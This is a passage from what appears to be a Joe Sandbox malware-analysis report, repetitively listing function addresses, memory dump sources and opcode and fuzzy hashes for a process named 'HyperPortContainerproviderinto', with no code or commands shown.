                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7dbf55d38a005179ca33d566d0a23956ccc176f61eac7784cf1a2e74ec132e70
                                                                          • Instruction ID: 0de03e576c0b1ec6be31d5e2beada5246c74b0a459d7fb128037c31324108b19
                                                                          • Opcode Fuzzy Hash: 7dbf55d38a005179ca33d566d0a23956ccc176f61eac7784cf1a2e74ec132e70
                                                                          • Instruction Fuzzy Hash: EC210A71A0991D9FDF98EB58C4A5AECB7B5FF68304F0041BE900EE32A1CE35A9418B40
                                                                          Function 00007FFD9BEAAC98 Relevance: .1, Instructions: 78COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b4229c2be688892a75f331869c7dde02f674fd529cb35a57cad2126d71e8d94f
                                                                          • Instruction ID: cc1e5f0fc810f89645c2af9ca5ce1a69079a195cf84262673d8b3d4596a3bf2e
                                                                          • Opcode Fuzzy Hash: b4229c2be688892a75f331869c7dde02f674fd529cb35a57cad2126d71e8d94f
                                                                          • Instruction Fuzzy Hash: DC214C71E19A4E9FEBA8DB98C8609FC77B5FF58300F11017AD04AE72A1DA396905DB40
                                                                          Function 00007FFD9BEAB7F9 Relevance: .1, Instructions: 72COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 70fa7a0ab41af177f2868d6691d9c29895e92a53c6d2a9046a7b838a9d8974c7
                                                                          • Instruction ID: 3c9017d5dee976cb7445e2c1452a7b778eda0d838d0fe72820bac12fe22b1fb8
                                                                          • Opcode Fuzzy Hash: 70fa7a0ab41af177f2868d6691d9c29895e92a53c6d2a9046a7b838a9d8974c7
                                                                          • Instruction Fuzzy Hash: 0B213B75A0A50D9FDB9CDB68C465ABDB7B5EF58310F0041BDD00ED72A1CA35AA408B40
                                                                          Function 00007FFD9BEAC90A Relevance: .1, Instructions: 71COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 78a94242c79cf2a1f69700d8b42a9ca83e7903d555d004bd3d4df9d2ccb5d003
                                                                          • Instruction ID: 5b23cd78ebc2b78339a66cd211c18fa78392876508b2185fcb482fb5473e1507
                                                                          • Opcode Fuzzy Hash: 78a94242c79cf2a1f69700d8b42a9ca83e7903d555d004bd3d4df9d2ccb5d003
                                                                          • Instruction Fuzzy Hash: 5B11F6B2F0EA4A4BEB68D7A848723A476DDFF54314F1502B9D05DC63D3EE2965028281
                                                                          Function 00007FFD9BEAE410 Relevance: .1, Instructions: 68COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 76c6f8a0f57ee526655b4fc7d9fbbe71d0c1e661d558d63ffa4ad48b1d7a0e92
                                                                          • Instruction ID: 77fbef267ad73e1ece36092e50c9d09a6cea2d10725475ecb02636d6f3ab96c2
                                                                          • Opcode Fuzzy Hash: 76c6f8a0f57ee526655b4fc7d9fbbe71d0c1e661d558d63ffa4ad48b1d7a0e92
                                                                          • Instruction Fuzzy Hash: 3711EB50A1E46F8AF63882C884B15B8765DFF90301B354A75F48FCB0DAC829BA81D380
                                                                          Function 00007FFD9BEA4540 Relevance: .1, Instructions: 68COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8505fae30f8554f1b3407433b366ec6c944afe7c6bb39b716d4dc663792aa067
                                                                          • Instruction ID: 76c3fb20f5bc8070f28a15284c408eaef3a080efb66516ce38d9176aae448341
                                                                          • Opcode Fuzzy Hash: 8505fae30f8554f1b3407433b366ec6c944afe7c6bb39b716d4dc663792aa067
                                                                          • Instruction Fuzzy Hash: 1A112451A1E46E87F738868C84704B472ADFF90301B26467DD09B8B4EAC929BA819781
                                                                          Function 00007FFD9BEA35C0 Relevance: .1, Instructions: 63COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 44c4cdaf1ac36627d46c0e933ccff94a58a1c557a9c046803b09d64014e413fb
                                                                          • Instruction ID: cc9d2088d154cc82f77039d7d16ea7ffcbb36911494201741b4e8712527af97d
                                                                          • Opcode Fuzzy Hash: 44c4cdaf1ac36627d46c0e933ccff94a58a1c557a9c046803b09d64014e413fb
                                                                          • Instruction Fuzzy Hash: 72110431F0A90E4FD7ADEA6484219F93394FF95354B01463AE04EC76E2CE29B9058780
                                                                          Function 00007FFD9BEAB820 Relevance: .1, Instructions: 60COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ecd27b9e9e2983f24e7b8d52b51a4dfaf24891f2359eb838afaa43b21c035c14
                                                                          • Instruction ID: a3ec8960d43ead1b30be1a1b2c79cf4812f6ad40a5fc1b50a2605396f0e018c4
                                                                          • Opcode Fuzzy Hash: ecd27b9e9e2983f24e7b8d52b51a4dfaf24891f2359eb838afaa43b21c035c14
                                                                          • Instruction Fuzzy Hash: BD110775A1991D8FDF9CDB68C4A5ABDB7B5EF58314F0001BEE01ED32A1CE356A808B40
                                                                          Function 00007FFD9BEA343E Relevance: .1, Instructions: 59COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 10d82d401912248c20f38577cab900388f20b2904d76c741c3498ad10120f47d
                                                                          • Instruction ID: 9643d825336ae236f5c2bfa6d04e75cbb73b7e8174a30e8776d6bb6003e9ff0d
                                                                          • Opcode Fuzzy Hash: 10d82d401912248c20f38577cab900388f20b2904d76c741c3498ad10120f47d
                                                                          • Instruction Fuzzy Hash: C7116B31B0A50E8FE75A9A48D4656F47398EF95351F12413BE40AC36E1DE2AA940C780
                                                                          Function 00007FFD9BEA842E Relevance: .1, Instructions: 59COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8d728b91924a5b702250bb0753d8b4a44177db5cd7cf0c6db7fa3e6dd79140d8
                                                                          • Instruction ID: 86793f97112c7fc2d17d2ad029704ccf9ae25965b3f148c623e2d38edcb29a3d
                                                                          • Opcode Fuzzy Hash: 8d728b91924a5b702250bb0753d8b4a44177db5cd7cf0c6db7fa3e6dd79140d8
                                                                          • Instruction Fuzzy Hash: 10116B31B0650E8FE7199A44D4656F833D8FF94361F41453BE80EC36E1DF2AA940C780
                                                                          Function 00007FFD9BEAD30E Relevance: .1, Instructions: 59COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ef794187f50563e399e909806c4b33fb0ff9d2cb9148975eaf0903d32e18127e
                                                                          • Instruction ID: 0648d11f8af2ea16b56f54e48f382946846ecdce0c923c7b5cac5245db5ddd9c
                                                                          • Opcode Fuzzy Hash: ef794187f50563e399e909806c4b33fb0ff9d2cb9148975eaf0903d32e18127e
                                                                          • Instruction Fuzzy Hash: 70116B31F0A50F8FF7199A48D4256F93398EF95361F05813AE81EC36E1CE2AA9408780
                                                                          Function 00007FFD9BEA2AA9 Relevance: .1, Instructions: 54COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ab7958e1ee24759d6354b6229f6285ea05ad1a585c2785273d1bffcfb3383c98
                                                                          • Instruction ID: c7df5b32dfd3cd9895f4ed871b0457bb62bdd4ace28b1d5af3a58ac3274ed1b0
                                                                          • Opcode Fuzzy Hash: ab7958e1ee24759d6354b6229f6285ea05ad1a585c2785273d1bffcfb3383c98
                                                                          • Instruction Fuzzy Hash: CF01D631F0AA4C4FEB59E7E498625FCB7A0FF49350B15007AE04DD32D7DD2958428740
                                                                          Function 00007FFD9BAA0C40 Relevance: .1, Instructions: 52COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1961172380.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9baa0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 113482c38d92eec82706f904849562c8ec4ae6ff87c714f1d8bfda1409c37b65
                                                                          • Instruction ID: 7ed2f910b6c4b56358a41e53173dcb7988823033cf3d105401df543936f0d587
                                                                          • Opcode Fuzzy Hash: 113482c38d92eec82706f904849562c8ec4ae6ff87c714f1d8bfda1409c37b65
                                                                          • Instruction Fuzzy Hash: B901F536F0A64D8FEB31DFA8C4901DDBBA1EF41711F0145B7D0489B2A1D974678587A4
                                                                          Function 00007FFD9BEA85AC Relevance: .0, Instructions: 49COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 28da93f4dfb3b29176ca0d0f765632fd724939cc67fc5d0b3af80653986834c8
                                                                          • Instruction ID: 43c50d4f1a38b96364863045917e35eef6d4341e3f8df1a5b19820d1492d7024
                                                                          • Opcode Fuzzy Hash: 28da93f4dfb3b29176ca0d0f765632fd724939cc67fc5d0b3af80653986834c8
                                                                          • Instruction Fuzzy Hash: 94012821A0EA5A4BE729A76048658FE7790AF85264780477EE0CACB5D2DE2CA5068390
                                                                          Function 00007FFD9BEAD48C Relevance: .0, Instructions: 47COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: bdb30fdeb43fd74e94afd3daa83e4c8627485dfb83f85041ef8743289b9a140a
                                                                          • Instruction ID: 7df43b962372cb380146c4d4c3eb8efd7118ef3a7c9e2372519eec21aff4fd8d
                                                                          • Opcode Fuzzy Hash: bdb30fdeb43fd74e94afd3daa83e4c8627485dfb83f85041ef8743289b9a140a
                                                                          • Instruction Fuzzy Hash: 22014C21F0EA4A4FD729A76184219FEB790FF45318B40467EE08FCB4E7CE2CA6058390
                                                                          Function 00007FFD9BAA0C48 Relevance: .0, Instructions: 46COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1961172380.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9baa0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3a7630d400884b2d79b2b8087680c158dc38c66062d1340b4c9e7a27c02296ef
                                                                          • Instruction ID: b0dae2793bd4040240da4bd83dec9a0574fa75b89c320af206397530e5fdb351
                                                                          • Opcode Fuzzy Hash: 3a7630d400884b2d79b2b8087680c158dc38c66062d1340b4c9e7a27c02296ef
                                                                          • Instruction Fuzzy Hash: 2E01F236E0E24D9FEB30DFA8C4901DCBBB1EF01B10F1141B7D0489B2A1EA7467858794
                                                                          Function 00007FFD9BAA460D Relevance: .0, Instructions: 42COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1961172380.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9baa0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5316d7e13b074a8df805b1f2cbe291338b92c9e0231264b14c9dc2febbc2eeb7
                                                                          • Instruction ID: 7d26e23e8fe7960c223607cb5e16511fec3086af38a5a6be1100ed1b7cd95544
                                                                          • Opcode Fuzzy Hash: 5316d7e13b074a8df805b1f2cbe291338b92c9e0231264b14c9dc2febbc2eeb7
                                                                          • Instruction Fuzzy Hash: A6016720F1995E4BEBF4E76884783B852D2AF48701F5101B9E40DE32F2DD786E408714
                                                                          Function 00007FFD9BAA0C50 Relevance: .0, Instructions: 41COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1961172380.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9baa0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d6d78d9f35b91e39f38e991446870572d1c353d2fa3d09af884ad8bf3b6f6bc3
                                                                          • Instruction ID: f4b724df3c0557ff17a20bf86ceefbbbf08e356660d6c722eaa03c0152447b09
                                                                          • Opcode Fuzzy Hash: d6d78d9f35b91e39f38e991446870572d1c353d2fa3d09af884ad8bf3b6f6bc3
                                                                          • Instruction Fuzzy Hash: B201F435E0E24D9FEB30DFA8C4905DDBBF1EF01704F1142B6D04897292EA7467808754
                                                                          Function 00007FFD9BEABAF2 Relevance: .0, Instructions: 40COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c7df9f3dd7894c6cb6d6af7b9e9615a4f09dded8cc09c31bab910bf2a620ffa8
                                                                          • Instruction ID: 9b3221175032cda673d539c717113b50baeaf90f15d6c9763dcdb5e96767bb02
                                                                          • Opcode Fuzzy Hash: c7df9f3dd7894c6cb6d6af7b9e9615a4f09dded8cc09c31bab910bf2a620ffa8
                                                                          • Instruction Fuzzy Hash: 6FF0627594F2C99FD7228BB089619E53FA8EF42304B1501E6D485CA0E2C92D1646C761
                                                                          Function 00007FFD9BEA1C42 Relevance: .0, Instructions: 36COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: db0c3443dd31cb50d9e73562d82a42845812a8702cb5315a026e79376be63f5a
                                                                          • Instruction ID: 1686708dc5c954cbb72fd4f3b110dcedff7eb332b504bfddef3fef60b5999881
                                                                          • Opcode Fuzzy Hash: db0c3443dd31cb50d9e73562d82a42845812a8702cb5315a026e79376be63f5a
                                                                          • Instruction Fuzzy Hash: 0DF0627244E2C99FD3169BB088615E97FB8AF43314B1A00E6E055870B2C96D560AC762
                                                                          Function 00007FFD9BEA6C32 Relevance: .0, Instructions: 36COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c84ec733f312bf5f869a3b49009374df7fa8c8f651119a62833f15561c677a82
                                                                          • Instruction ID: 5b0144d76ebf75cb14aa3c9d62f99a9a18f8559cd7bc14e1bf9ae011919528ce
                                                                          • Opcode Fuzzy Hash: c84ec733f312bf5f869a3b49009374df7fa8c8f651119a62833f15561c677a82
                                                                          • Instruction Fuzzy Hash: E9F0627154E2C99FD316DBB088655A57FB8EF43314B1A00EAD485CB0A2C52E2746C761
                                                                          Function 00007FFD9BEAC878 Relevance: .0, Instructions: 36COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: cf06eb9627ac540df4ae15cef93b777998ecd74093dfed1a331403e843b08ce5
                                                                          • Instruction ID: ca375f32721886832295ddd23271aecee8d88444a2b803907b689a1065bfe046
                                                                          • Opcode Fuzzy Hash: cf06eb9627ac540df4ae15cef93b777998ecd74093dfed1a331403e843b08ce5
                                                                          • Instruction Fuzzy Hash: 27F0CD7070AA0E9FD718DB5DC4A0428F3BAFF407247A0427DC00A8B296CB25BC12CB84
                                                                          Function 00007FFD9BEA1903 Relevance: .0, Instructions: 35COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d22a8e422b156d5809998a2f26626c4b4fdbf4edca1dfab634183af3fc6a9455
                                                                          • Instruction ID: 695d384176fb80cdcc042958ccf3390ab2701ff795e4501a8954918e6c385004
                                                                          • Opcode Fuzzy Hash: d22a8e422b156d5809998a2f26626c4b4fdbf4edca1dfab634183af3fc6a9455
                                                                          • Instruction Fuzzy Hash: 1101C074A1992D8FDFA9DB48C8A4BA8B7B5FB69301F1041D9800EE3660DB719A84CF05
                                                                          Function 00007FFD9BEA8408 Relevance: .0, Instructions: 34COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3251456e6efdbafd18ca00f6a7265f97c79e88b323a6020222b292e2bf2516f9
                                                                          • Instruction ID: 6af1e78bb4cee854e0210662b2f72ba6d6a8fbd118de0149e0fe180c9cf44dcb
                                                                          • Opcode Fuzzy Hash: 3251456e6efdbafd18ca00f6a7265f97c79e88b323a6020222b292e2bf2516f9
                                                                          • Instruction Fuzzy Hash: D1F082A5F0F90F8AF779699054321FD269CAF91351FA20476D44E825E2DD1B6A024291
                                                                          Function 00007FFD9BEAD2E8 Relevance: .0, Instructions: 34COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0142479e9d0ba49dff37b8a4122d994e181c31e9e678978fd6aafe69ca752b3a
                                                                          • Instruction ID: affae9faf42e5d3b852c0137b0b31fb69db804fa5b622b2db7b1f205ea4a4f7c
                                                                          • Opcode Fuzzy Hash: 0142479e9d0ba49dff37b8a4122d994e181c31e9e678978fd6aafe69ca752b3a
                                                                          • Instruction Fuzzy Hash: 4CF0BEA1F0F54F8AF736259094322F8668CAF46341F23853AD44E825E1CD1B6A4282A1
                                                                          Function 00007FFD9BAA46C0 Relevance: .0, Instructions: 24COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1961172380.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9baa0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3532ad8091aa4669aad5d237275ad7b9948723c9841d611c5adca3e29d40f666
                                                                          • Instruction ID: ebd26184bcc6238ceb0f0f55426a8eb4e7bd6211fb93a1b8e667920044334297
                                                                          • Opcode Fuzzy Hash: 3532ad8091aa4669aad5d237275ad7b9948723c9841d611c5adca3e29d40f666
                                                                          • Instruction Fuzzy Hash: C4F0AC20E0995E8AEBB4AB94C8687BC6362AF44706F110179D44DA75B2CEB82A818A14
                                                                          Function 00007FFD9BAA4579 Relevance: .0, Instructions: 21COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1961172380.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9baa0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3f79f135523dc3c203bd00b4aa85070bde644ae3a04f68e83e6a7746b0bf9d7f
                                                                          • Instruction ID: 6ca19b6f87813941f8a7ad11e830774c4147c72025fbb930c441b2575cb2d94b
                                                                          • Opcode Fuzzy Hash: 3f79f135523dc3c203bd00b4aa85070bde644ae3a04f68e83e6a7746b0bf9d7f
                                                                          • Instruction Fuzzy Hash: C1E09230F0A41E8AF774A780CC603F96263AF94B00F0600B4C90DE32E1DD786E418B24
                                                                          Function 00007FFD9BAA464E Relevance: .0, Instructions: 19COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1961172380.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9baa0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6f92081f07beb2e3239345a2ea271dcb9cb0d5a112ba4e0bced2240eaa25072a
                                                                          • Instruction ID: 165a6bb31b32bbf1dc7e6d935380642dafa814f27162c19ffc74a8c1af673704
                                                                          • Opcode Fuzzy Hash: 6f92081f07beb2e3239345a2ea271dcb9cb0d5a112ba4e0bced2240eaa25072a
                                                                          • Instruction Fuzzy Hash: ECE0BF10F0D54E46FAB4D79484687B853539F44705F1141B9954DA31F2CDB93E818624
                                                                          Function 00007FFD9BAA0B9D Relevance: .0, Instructions: 14COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1961172380.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9baa0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 102bf9c243271cfa9f39deb2b342e431213a3f7e4d8b4957775e5efbda621b2f
                                                                          • Instruction ID: 3cad15104fe9fc78965b81dcddf47b3f08b4bfff19ae7eafe5888cc459d827ac
                                                                          • Opcode Fuzzy Hash: 102bf9c243271cfa9f39deb2b342e431213a3f7e4d8b4957775e5efbda621b2f
                                                                          • Instruction Fuzzy Hash: C7C08C3062980E8FDA50FB3CC8C9824BBE0FF4E301BDA00E0E04CCB1B1D65A9890C700
                                                                          Function 00007FFD9BAA06A5 Relevance: .0, Instructions: 13COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1961172380.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9baa0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
